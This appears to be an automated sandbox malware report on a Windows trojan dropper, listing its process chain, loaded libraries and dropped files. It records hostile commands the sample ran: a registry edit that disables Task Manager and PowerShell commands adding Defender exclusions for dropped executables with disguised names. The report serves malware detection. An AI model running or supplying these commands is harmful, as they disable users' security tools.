Source: powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00CB6FAA

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CB848E	0_2_00CB848E
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC6CDC	0_2_00CC6CDC
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CB40FE	0_2_00CB40FE
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC4088	0_2_00CC4088
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC00B7	0_2_00CC00B7
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CD51C9	0_2_00CD51C9
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC7153	0_2_00CC7153
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC62CA	0_2_00CC62CA
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CB32F7	0_2_00CB32F7
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC43BF	0_2_00CC43BF
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CDD440	0_2_00CDD440
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBF461	0_2_00CBF461
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBC426	0_2_00CBC426
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC77EF	0_2_00CC77EF
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CDD8EE	0_2_00CDD8EE
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CB286B	0_2_00CB286B
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CE19F4	0_2_00CE19F4
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBE9B7	0_2_00CBE9B7
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CC3E0B	0_2_00CC3E0B
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBEFE2	0_2_00CBEFE2
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CD4F9A	0_2_00CD4F9A
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC580D74	8_2_00007FFAAC580D74
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC581EE9	8_2_00007FFAAC581EE9
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC744E97	8_2_00007FFAAC744E97
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC7436FA	8_2_00007FFAAC7436FA
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC73000B	8_2_00007FFAAC73000B
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC7308DD	8_2_00007FFAAC7308DD
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC7439FA	8_2_00007FFAAC7439FA
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC7449FA	8_2_00007FFAAC7449FA
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC745429	8_2_00007FFAAC745429
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAAC7D5DC3	8_2_00007FFAAC7D5DC3
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAACC91120	8_2_00007FFAACC91120
Source: C:\RuntimeDll\cef_process.exe	Code function: 8_2_00007FFAACC912A8	8_2_00007FFAACC912A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAAC6330E7	9_2_00007FFAAC6330E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFAAC58B8FA	12_2_00007FFAAC58B8FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFAAC580E93	12_2_00007FFAAC580E93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFAAC6530E7	12_2_00007FFAAC6530E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC6230E9	14_2_00007FFAAC6230E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC6530E7	16_2_00007FFAAC6530E7
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC570D74	24_2_00007FFAAC570D74
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC571EE9	24_2_00007FFAAC571EE9
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC734E97	24_2_00007FFAAC734E97
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC7336FA	24_2_00007FFAAC7336FA
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC72000B	24_2_00007FFAAC72000B
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC720033	24_2_00007FFAAC720033
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC7208DD	24_2_00007FFAAC7208DD
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC7339FA	24_2_00007FFAAC7339FA
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC7349FA	24_2_00007FFAAC7349FA
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC735429	24_2_00007FFAAC735429
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAAC7C5DC3	24_2_00007FFAAC7C5DC3
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAACC81120	24_2_00007FFAACC81120
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Code function: 24_2_00007FFAACC813B8	24_2_00007FFAACC813B8

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\CNRzgtSC.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: String function: 00CCEB78 appears 39 times
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: String function: 00CCF5F0 appears 31 times
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: String function: 00CCEC50 appears 56 times

Source: kBY9lgRaca.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@36/84@0/1

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CB6C74 GetLastError,FormatMessageW,

0_2_00CB6C74

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00CCA6C2

Source: C:\RuntimeDll\cef_process.exe

File created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

Jump to behavior

Source: C:\RuntimeDll\cef_process.exe

File created: C:\Users\user\Desktop\iqbcNzlc.log

Jump to behavior

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\95a8a15b4debae5cc9ba5a26d497e25cb314b3e364d37e594efe016891e0764b

Source: C:\RuntimeDll\cef_process.exe

File created: C:\Users\user\AppData\Local\Temp\npEqFN9XfG

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Command line argument: sfxname	0_2_00CCDF1E
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Command line argument: sfxstime	0_2_00CCDF1E
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Command line argument: STARTDLG	0_2_00CCDF1E

Source: kBY9lgRaca.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

File read: C:\Users\user\Desktop\kBY9lgRaca.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kBY9lgRaca.exe "C:\Users\user\Desktop\kBY9lgRaca.exe"
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: version.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Section loaded: slc.dll	Jump to behavior
